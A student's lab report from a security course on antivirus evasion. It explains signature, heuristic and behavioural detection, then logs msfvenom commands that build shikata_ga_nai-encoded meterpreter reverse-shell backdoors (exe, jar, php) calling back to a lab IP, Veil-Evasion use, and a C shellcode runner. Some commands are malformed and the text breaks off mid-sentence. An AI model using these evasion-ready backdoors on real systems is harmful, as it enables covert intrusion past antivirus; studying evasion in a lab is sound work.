Exp3 免杀原理与实践 20164320 王浩

一、实验内容

1.1 正确使用msf编码器（0.5分），msfvenom生成如jar之类的其他文件（0.5分），veil-evasion（0.5分），加壳工具（0.5分），使用shellcode编程（1分）

1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)（如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。）

1.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5）

二、基础问题回答

（1）杀软是如何检测出恶意代码的？
杀毒软件一般是通过以下三种检测方法来检测恶意代码的：

基于特征码的检测
根据恶意代码的各种特殊的一个或者多个片段形成一个特征码库，如果一个可执行文件（或其他运行的库、脚本等）包含特征码库中的数据则被认为是恶意代码。并不是比对整个文件，而是将其中一个或几个片断作为识别依据。所以杀毒软件的恶意代码的病毒库的更新和全面性十分重要，过时的特征码库就无法检测出新的病毒，所以我们也需要及时更新自己的杀毒软件。
启发式恶意软件检测
根据些片面特征去推断。通常是因为缺乏精确判定依据。如果一个软件在干通常是恶意软件干的事，看起来了像个恶意软件，那我们就把它当成一个恶意软件。
优点：
（1）可以检测0-day恶意软件
（2）具有一定通用性
缺点：
（1）实时监控系统行为，开销稍多
（2）没有基于特征码的精确度高
基于行为的恶意软件检测
最开始提出启发式时，一般也是针对特征扫描的而言的，指通用的、多特征的、非精确的扫描，所以后来又提出了基于行为的。从理论上讲，基于行为的检测相当于是启发式的一种，或者是加入了行为监控的启发式。

（2）免杀是做什么？

免杀就是做出令杀毒软件无法鉴定为恶意代码的后门等，无法被杀毒软件发现的程序。

（3）免杀的基本方法有哪些？

改变特征码
- 对exe文件加壳：压缩壳加密壳
- 对shellcode用encode进行编码
- 基于payload重新编译生成可执行文件
- 用其他语言进行重写再编译（veil-evasion）
改变行为
（1）通讯方式
- 尽量使用反弹式连接
- 使用隧道技术
- 加密通讯数据

（2）操作模式
- 基于内存操作
- 减少对系统的修改
- 加入混淆作用的正常功能代码

非常规方法
- 使用一个有漏洞的应用当成后门，编写攻击代码集成到如MSF中。
- 使用社工类攻击，诱骗目标关闭AV软件。
- 纯手工打造一个恶意软件

三、实验过程记录

3.1 正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，加壳工具，使用shellcode编程。

3.1.1 正确使用msf编码器

有关msfvenom的参数与使用：

使用msf编码器，msfvenom生成如jar之类的其他文件

Msfvenom是Metasploit平台下用来编码payloads免杀的工具。以Metaspliot的知名度和普及度。理所当然，所有AV厂家都盯着呢，一有新编码算法，马上就得加到特征库里。通过编码后，按理论上讲，编码会降低检出率，大不了多编码几次，总会检不出来。
编码一次命令如下（用-e参数编码）：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -b ‘\x00’ LHOST=192.168.40.128 LPORT=4320 -f exe > 20164320_backdoor.exe

放去virscan扫描，扫出问题

改下名字重新测试

编码十次命令如下（用-i参数指定编码次数）：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.40.128 LPORT=4320 -f exe > 20164320 wanghao.exe

又是这个问题

重新改名

放入网站发现有28个软件查出问题

生成.jar文件夹
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.19.40.128 lport=4320 x> 20164320_backdoor_java.jar

结果出现这个问题？？？

av???什么鬼？只好改名字，在测试

结果竟然只有14%的查出了病毒？？？运气这么好？

msfvenom生成php文件：
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.40.128lport=4320 x> 20164320_backdoor.php

竟然只有2%？？？？？我是不是不用继续做下去了？？算了，不皮了，继续

使用veil-evasion生成后门程序及检测

安装veil

如果镜像是2018的话，在安装之前可以先执行下面的指令，可能会需要比较长的时间

mkdir -p ~/.cache/wine
cd ~/.cache/wine 
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

用sudo apt-get install veil-evasion命令安装Veil
之后用veil打开veil，输入y继续安装直至完成，这期间可能要等待较长时间：

到现在为止还算顺利，成功下载

疯狂解压

结果到最后，在这个鬼地方卡了***半天，不管怎么调都动不了

找了半天，想到了一个办法

将这个文件拷贝到

这个目录下，就可以无需解压了

试了试，成功了！

顺利进入安装界面

开始安装

安装完毕后，打开veil

结果？？？？？

，

疯狂报错？？？到网上找了半天也没有什么有建设性的建议，最后没办法，屈服于这个鬼东西

从同学那拷贝了一个过来，继续实验

输入veil指令，会出现下面这个界面

用use evasion命令进入Evil-Evasion

输入命令use c/meterpreter/rev_tcp.py进入配置界面

设置反弹连接IP，命令为：set LHOST 192.168.40.128，注意此处的IP是KaliIP；
设置端口，命令为：set LPORT 4320

在主机中找到生成文件位置 var/lib/veil/output/handlers/generate

输入generate生成文件，接着输入你想要playload的名字：20164320

如图所示，该文件子啊output/handlers/20164320这个位置

放入网站检测

好吧。。。。。再次修改，再上传

行吧，竟然还不如之前？？？

半手工注入Shellcode并执行

首先使用命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.128LPORT=4320 -f c用c语言生成一段shellcode;

创建一个文件20165318.c，然后将unsigned char buf[]赋值到其中，代码如下：

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
此处省略
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}


使用命令：i686-w64-mingw32-g++ 20164320.c -o 20164320.exe编译这个.c文件为可执行文件;

执行这个文件

再放入网站进行检查

.加壳尝试一下

加壳的全称应该是可执行程序资源压缩，压缩后的程序可以直接运行。
加壳的另一种常用的方式是在二进制的程序中植入一段代码，在运行的时候优先取得程序的控制权，之后再把控制权交还给原始代码，这样做的目的是为了隐藏程序真正的OEP（入口点，防止被破解）。大多数病毒就是基于此原理。
加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析，以达到保护壳内原始程序以及软件不被外部程序破坏，保证原始程序正常运行。
这种技术也常用来保护软件版权，防止软件被破解。但对于病毒，加壳可以绕过一些杀毒软件的扫描，从而实现它作为病毒的一些入侵或破坏的一些特性。
MSF的编码器使用类似方法，对shellcode进行再编码。

在技术上分壳分为：